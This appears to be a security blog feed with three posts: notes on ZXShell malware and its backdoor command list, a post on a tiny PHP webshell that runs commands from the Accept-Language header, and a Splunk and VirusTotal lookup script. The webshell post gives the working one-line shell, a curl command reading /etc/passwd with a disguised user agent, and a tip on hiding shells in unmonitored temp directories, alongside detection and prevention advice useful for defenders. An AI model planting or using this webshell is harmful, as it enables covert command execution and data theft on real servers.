<a href="http://3.bp.blogspot.com/-UUsIbI-vNMU/UwQU_nEkuFI/AAAAAAAAFe4/sKPodkH1QGY/s1600/ns1.china.com.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-UUsIbI-vNMU/UwQU_nEkuFI/AAAAAAAAFe4/sKPodkH1QGY/s1600/ns1.china.com.jpg" /></a></div>
<span style="font-family: Calibri; font-size: medium;">In general this is horrible OpSec, if you spend a few minutes looking at <a href="https://www.virustotal.com/en/file/3d362ba0c4bc06b69a3a908bc62a50a2a673c10060f4b9268b8641536b43c5ac/analysis/" target="_blank">it</a> you'll find many examples. Maybe just a case of being lazy or perhaps they were only testing something.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-kLEoRX7Xt64/UwQXC7U4TzI/AAAAAAAAFfE/gnXoQ1AuTWk/s1600/onlyatest.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kLEoRX7Xt64/UwQXC7U4TzI/AAAAAAAAFfE/gnXoQ1AuTWk/s1600/onlyatest.tiff" height="199" width="320" /></a></div>
<span style="font-family: Calibri; font-size: medium;">Lots of strangeness with this one but that makes it fun. There is still a lot to dig through but I wanted to post some of my notes while its fresh in my head. If you find anything interesting or something I missed, let me know.</span><br />
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;"><b>3.10 ZXShell Commands</b></span><br />
<pre>CA ==> cloning system account
CleanEvent -> Clear System Diary
CloseFW -> temporarily closed windows comes with a firewall
End -> end of the program
Execute ==> run a program
Time information FileTime ==> clone a file
FindPass -> Find a login account password x
FindDialPass -> lists all the dial-up account and password x
Help | -?> Display the information
KeyLog ==> remote computer to capture or record key information x
LoadDll ==> load a DLL or inserted into the specified process
PortScan ==> port scanning
Ps ==> Process Management
RunAs ==> to other processes or identity of the user running the program
SC ==> Service Management
ShareShell ==> Sharing a Shell to others.
ShutDown ==> Logout | | restart | | closed system
Sysinfo -> View System Details
SYNFlood -> SYN attacks x
TermSvc ==> Terminal Services Configuration
TransFile ==> from the specified URL to download files or upload files to a specified FTP server
Uninstall -> uninstall
User ==> Account Management System
ZXARPS ==> ZXARPS x
ZXFtpServer ==> FTP server x
ZXNC ==> NC
ZXHttpProxy ==> HTTP proxy server
ZXHttpServer ==> HTTP server
ZXPlug ==> plug-in function, you can add custom commands
ZXSockProxy ==> Socks 4 & 5 Proxy
The command completed successfully.
</pre>
<div>
<br /></div>
<span style="font-family: Calibri; font-size: medium;">From the attackers perspective here is the command shell. Do you have alerts/logging for cmd.exe running as system? Check out <a href="http://energy.gov/sites/prod/files/cioprod/documents/Splunkified_-_the_Next_Evolution_of_Log_Analysis_-_Green_and_McCord.pdf" target="_blank">Windows Logging Service</a></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-SCy1qJUs9ro/UwQb88rpQJI/AAAAAAAAFfU/amjeL_HS4bA/s1600/zx+dos+prompt+system.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SCy1qJUs9ro/UwQb88rpQJI/AAAAAAAAFfU/amjeL_HS4bA/s1600/zx+dos+prompt+system.tiff" height="307" width="640" /></a></div>
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;">And also running VNC from the C2 server:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2XnW0alnXOo/UwQcwBbBMAI/AAAAAAAAFfc/qHkHWgBC8eE/s1600/zx+shell+remote+desktop.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-2XnW0alnXOo/UwQcwBbBMAI/AAAAAAAAFfc/qHkHWgBC8eE/s1600/zx+shell+remote+desktop.tiff" height="283" width="400" /></a></div>
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;">Dropper calling home to the command and controller server (pcap is from vfw dropper):</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-a2deglh4DPE/UwQd90yMS1I/AAAAAAAAFfo/79Nri1uLKoE/s1600/callinghome.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-a2deglh4DPE/UwQd90yMS1I/AAAAAAAAFfo/79Nri1uLKoE/s1600/callinghome.tiff" /></a></div>
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;">Happy hunting.</span><br />
<br />Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-55083416117869596462013-09-02T05:07:00.000-07:002013-09-02T06:04:04.417-07:00GET your Webshell While Evading Detection<span style="font-family: Arial, Helvetica, sans-serif;">Recently I came across a webshell that was a bit different from the others. Besides being only 48 bytes it uses the 'Accept-Language' http header field for accepting remote commands. The webshell on the server would only need to contain: </span><span style="background-color: #b6d7a8; font-family: Times, 'Times New Roman', serif; text-align: center;"><?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"))?></span><br />
<span style="background-color: #b6d7a8; font-family: Times, 'Times New Roman', serif; text-align: center;"><br /></span>
<br />
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">There are a few benefits to this from the attackers perspective. The main benefit is that utilizes HTTP GET which is quite difficult to find anomalies from the http logs, even with Splunk (unless the attacker calls the file webshell.php). I would bet most people would be on the lookout for http posts to a new file versus http get. With Splunk you can monitor and alert on http POST deviations, but with GET it seem that strategy won't cut it. </span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Using curl we GET the request 48bytes.php and add in the Accept-Language header followed by the shell command of 'cat /etc/passwd'. Additionaly I added in the -A to use a less conspicuous user agent.</span></div>
<div style="text-align: left;">
<span style="background-color: #b6d7a8; font-family: Times, Times New Roman, serif;">curl -H "Accept-Language: cat /etc/passwd" -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:72.0) Gecko/20132121 Firefox/19.0" http://192.168.110.114/webshells/48bytes.php</span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">When requesting the webshell, the Apache logs will show (standard CentOS 6 install):</span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="background-color: #b6d7a8;"> [01/Sep/2013:13:02:37 -0700] "GET /webshells/48bytes.php HTTP/1.1" 200 1973 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0"</span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The response from the web server, as you would expect looks like this:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ta8lHVM9FKA/UiOpDY2S5VI/AAAAAAAAFB8/hH0ZaVZuAt8/s1600/webshell_response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="403" src="http://2.bp.blogspot.com/-ta8lHVM9FKA/UiOpDY2S5VI/AAAAAAAAFB8/hH0ZaVZuAt8/s640/webshell_response.png" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: Arial, Helvetica, sans-serif;">Running tcpdump we can see the following traffic flow:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v8eRYsVbOdE/UiOrQbHRsgI/AAAAAAAAFCI/W9SlvThQk4k/s1600/wire.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="http://3.bp.blogspot.com/-v8eRYsVbOdE/UiOrQbHRsgI/AAAAAAAAFCI/W9SlvThQk4k/s640/wire.tiff" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Following the tcp stream in wireshark gives us this view: (notice the Accept-Language: cat /etc/passwd)</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-gdnl9zhGc6c/UiOpCjEW8qI/AAAAAAAAFB0/XJtqpqex470/s1600/FollowTCPStream.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://3.bp.blogspot.com/-gdnl9zhGc6c/UiOpCjEW8qI/AAAAAAAAFB0/XJtqpqex470/s640/FollowTCPStream.tiff" width="566" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">So how do the good guys detect this?</span></h3>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">I was hoping that <a href="http://bro.org/" target="_blank">Bro Network Security Monitor</a> would help, however by default it doesn't log the Accept-Language string (It logs which headers are used). Even if the majority of sites in your enterprise use TLS it's probably not a bad idea to enable the collection of header data to your web servers. If you're sending the Bro logs to Splunk (with header data) you can create an alert to fire on key words, length etc.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Bro_http log of 'cat /etc/passwd' via webshell:</span></div>
<div>
<span style="font-family: Times, Times New Roman, serif;"><span style="background-color: #b6d7a8;">1378069940.789597</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">SvWL0TLDOB3</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">192.168.110.129</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">58148</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">192.168.110.114</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">80</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">0</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">-</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">-</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">-</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">-</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">-</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">0</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span><span style="background-color: #b6d7a8;">1973</span><span class="Apple-tab-span" style="background-color: #b6d7a8; white-space: pre;"> </span></span><span style="background-color: #b6d7a8; font-family: Times, Times New Roman, serif;">200 OK - - - (empty) - HOST,USER-AGENT,ACCEPT,ACCEPT-LANGUAGE,ACCEPT-ENCODING,REFERER,CONNECTION HOST,USER-AGENT,ACCEPT,ACCEPT-LANGUAGE,ACCEPT-ENCODING,REFERER,CONNECTION</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Using Snort also has the same drawback of missing out on TLS connections. If you are using a Proxy and have a tap into the unencrypted traffic this would be an ideal solution (along with using Bro). </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Using Google Rapid Response (</span><span style="font-family: Arial, Helvetica, sans-serif;">GRR) you can launch a hunt on your web servers (or all servers for that matter) for files containing 'passthru' and '<?php'. Of course prevention is much easier to do then detecting it.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">With <a href="http://www.ossec.net/" target="_blank">OSSEC</a> file integrity monitor you will have a file based method of detection depending on the site content and structure. Since most people exclude temp directories from file integrity monitor, its the best place to put a webshell ;)</span><br />
<h4>
<span style="font-family: Arial, Helvetica, sans-serif;">Prevention</span></h4>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">If you have a public facing server without <a href="http://grsecurity.net/" target="_blank">grsecurity</a>, yer gonna have a bad time. In my opinion grsec with a well defined policy is the first place to start. Well maybe the first place start is having the admins disable exec(), passthru() and system()! Good luck with that :)</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-75485678630675803202013-05-27T07:49:00.000-07:002013-05-29T07:56:49.155-07:00Splunking Virustotal PoC<div class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif;">Doing malware analysis and research on a frequent basis I'm all about trying to make life easier, getting information faster. <a href="http://www.bro.org/" target="_blank">Bro</a>, <a href="http://www.splunk.com/" target="_blank">Splunk</a> and <a href="http://virustotal.com/en/search/" target="_blank">Virustotal</a> are tools that I'm constantly interfacing with. I thought it would be awesome if I could use Virustotal's api to search md5's gathered from Bro logs on Splunk. These three tools provide an amazing amount of useful information, with their powers combined I hoped it would make life a bit easier and help me connect the dots faster.</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<h2>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">Requirements</span></h2>
<span style="font-family: Arial, Helvetica, sans-serif;">To test this concept I'm using CentOS and the limited version of Splunk. Beyond that you will also need:</span><br />
<br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://virustotal.com/" target="_blank">Register</a> with Virustotal to get an API key.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Python Development libraries</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Install Splunk and have log source containing md5's (<a href="http://www.bro.org/" target="_blank">Bro</a>!)</span></li>
</ul>
<br />
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">Splunk Configuration</span></h3>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">To get started we are going to create a generic Splunk app and copy over our python scripts. Next we configure the Splunk lookups and test it out.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Create a new Splunk App, choose "Manage apps..."</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-kqJEbz6L08A/UaLDJmDtIQI/AAAAAAAAE9I/j7lZiS3yFE4/s1600/Splunkappwindow.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="159" src="http://1.bp.blogspot.com/-kqJEbz6L08A/UaLDJmDtIQI/AAAAAAAAE9I/j7lZiS3yFE4/s320/Splunkappwindow.tiff" width="320" /></span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Click create app</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FdlbXZXXpmA/UaLDYTh_KiI/AAAAAAAAE9Q/CevSMSXnpdg/s1600/SplunkManagerApps.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="139" src="http://3.bp.blogspot.com/-FdlbXZXXpmA/UaLDYTh_KiI/AAAAAAAAE9Q/CevSMSXnpdg/s320/SplunkManagerApps.tiff" width="320" /></span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Add in the name, location of app and save.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Tj0fGMjT3Ks/UaLEvtm9EWI/AAAAAAAAE9g/rQsLNk4yfQU/s1600/addNew.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="320" src="http://1.bp.blogspot.com/-Tj0fGMjT3Ks/UaLEvtm9EWI/AAAAAAAAE9g/rQsLNk4yfQU/s320/addNew.tiff" width="200" /></span></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Now would be a great time to import some logs containing md5's or setup Bro and acquire them. You will want to extract the md5 field from your logs as well, or you can use rex on the fly.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span></div>
<div>
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">Python Scripts</span></h3>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Since Splunk's version of Python is bare bones you'll need to create a wrapper that calls the actual script. Searching Splunk's site I found that someone had created a script already to do just this.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Save this to</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> /opt/splunk/etc/app/vtLookup/bin/wrapper.py</span></div>
<blockquote>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">import os, sys<br /> </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">for envvar in ("PYTHONPATH", "LD_LIBRARY_PATH"):<br /> </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if envvar in os.environ:<br /> </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> del os.environ[envvar]<br /> </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">python_executable = "/usr/bin/python"<br /> </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">real_script = "/opt/splunk/etc/apps/vtlookup/bin/vt.py"<br /> </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">os.execv(python_executable, [ python_executable, real_script ] + sys.argv[1:])</span></blockquote>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Now we create the script that takes the md5 from Splunk and does a lookup using Virustotals API.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Save this to<span style="font-size: x-small;"> </span><span style="font-size: x-small;">/opt/splunk/etc/app/vtLookup/bin/vtLookup.py </span>Don't forget to enter in the API key.</span><br />
<blockquote class="tr_bq">
<blockquote>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">import csv,sys,urllib,urllib2</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">def lookup(md5):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> try:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> response = urllib2.urlopen('https://www.virustotal.com/vtapi/v2/file/report', \</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> 'apikey=Enter in your API key here&resource=' + md5)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> lines = response.read()</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> return lines</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> except:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> return ''</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">def main():</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if len(sys.argv) != 3:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> print "python vt.py MD5 VT"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> sys.exit(0)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> md5f = sys.argv[1]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> vtf = sys.argv[2]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> r = csv.reader(sys.stdin)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> w = None</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> header = []</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> first = True</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> for line in r:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if first:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> header = line</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if vtf not in header or md5f not in header:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> print "missing vt or md5 field"</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> sys.exit(0)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> csv.writer(sys.stdout).writerow(header)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> w = csv.DictWriter(sys.stdout, header)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> first = False</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> continue</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> result = {}</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> i = 0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> while i < len(header):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if i < len(line):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> result[header[i]] = line[i]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> else:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> result[header[i]] = ''</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> i += 1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if len(result[md5f]) and len(result[vtf]):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> w.writerow(result)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> elif len(result[md5f]):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> result[vtf] = lookup(result[md5f])</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> if len(result[vtf]):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"> w.writerow(result)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">main()</span><br />
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Next </span><span style="font-family: Arial, Helvetica, sans-serif;">we tell Splunk the location of the scripts and create a lookup.</span><span style="font-family: Arial, Helvetica, sans-serif;"> </span><span style="font-family: Arial, Helvetica, sans-serif;">In the Splunk manager select Lookups:</span></blockquote>
</blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-WJwRcOSwuAY/UaNlnM_hQvI/AAAAAAAAE94/-Jf1pWWmfkI/s1600/lookups.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="33" src="http://4.bp.blogspot.com/-WJwRcOSwuAY/UaNlnM_hQvI/AAAAAAAAE94/-Jf1pWWmfkI/s320/lookups.tiff" width="320" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Then Lookup definitions: </span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-PkSlzQ5KHA4/UaNlnJ61LRI/AAAAAAAAE9w/KCdR-T-R5EY/s1600/LookupDef.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="34" src="http://4.bp.blogspot.com/-PkSlzQ5KHA4/UaNlnJ61LRI/AAAAAAAAE9w/KCdR-T-R5EY/s320/LookupDef.tiff" width="320" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The 'Type' is external since we are calling an external script. The command is 'wrapper.py md5 vt', supported fields are md5, vt. Once you have that entered in, click Save.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-lY8Hx5L1yaI/UaNlnnTySoI/AAAAAAAAE-A/-jZbg6u4dsg/s1600/vtLookupConfig.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="240" src="http://4.bp.blogspot.com/-lY8Hx5L1yaI/UaNlnnTySoI/AAAAAAAAE-A/-jZbg6u4dsg/s640/vtLookupConfig.tiff" width="640" /></span></a></div>
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<br />
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">Splunking</span></h3>
<span style="font-family: Arial, Helvetica, sans-serif;">Now lets test it out and see if it works. The query to test was to call one known good md5 and pass it to the lookup script. The first part is specifing fields that are not "-" then send it to top and only give me one result back. The part we are concerned with is "lookup vtLookup md5".</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-HdyZGxRuykc/UaNpJqf0HMI/AAAAAAAAE-Y/x0rs9fszh_I/s1600/Splunking.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="http://4.bp.blogspot.com/-HdyZGxRuykc/UaNpJqf0HMI/AAAAAAAAE-Y/x0rs9fszh_I/s320/Splunking.tiff" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Running the search we see the new field "vt" with the response from Virustotal. Great! but I really want to search all time and find out some trends.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-1qQmJZpaFVQ/UaNqLLhDyZI/AAAAAAAAE-k/xmLj6V6Xxvo/s1600/Splunking2.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://2.bp.blogspot.com/-1qQmJZpaFVQ/UaNqLLhDyZI/AAAAAAAAE-k/xmLj6V6Xxvo/s640/Splunking2.tiff" width="640" /></a></div>
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="font-family: Arial, Helvetica, sans-serif;">When I bump of the search to return 10 responses we start seeing no response from Virustotal since our api call requests are limited. Boooo. </span><br />
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-S-S5g3o114w/UaNsKTukwPI/AAAAAAAAE-0/5OoqWY9WCP0/s1600/SplunkingTop10.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="http://3.bp.blogspot.com/-S-S5g3o114w/UaNsKTukwPI/AAAAAAAAE-0/5OoqWY9WCP0/s640/SplunkingTop10.tiff" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The limitations set by Virustotal doesn't make this very practical in Splunk. It was fun to try and maybe this will come in handy in the future.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span><span style="font-size: x-small;"><span style="font-family: Arial, Helvetica, sans-serif;">Edit: Python scripts added to git repo </span></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">https://code.google.com/p/splunk-virustotal/</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span></div>
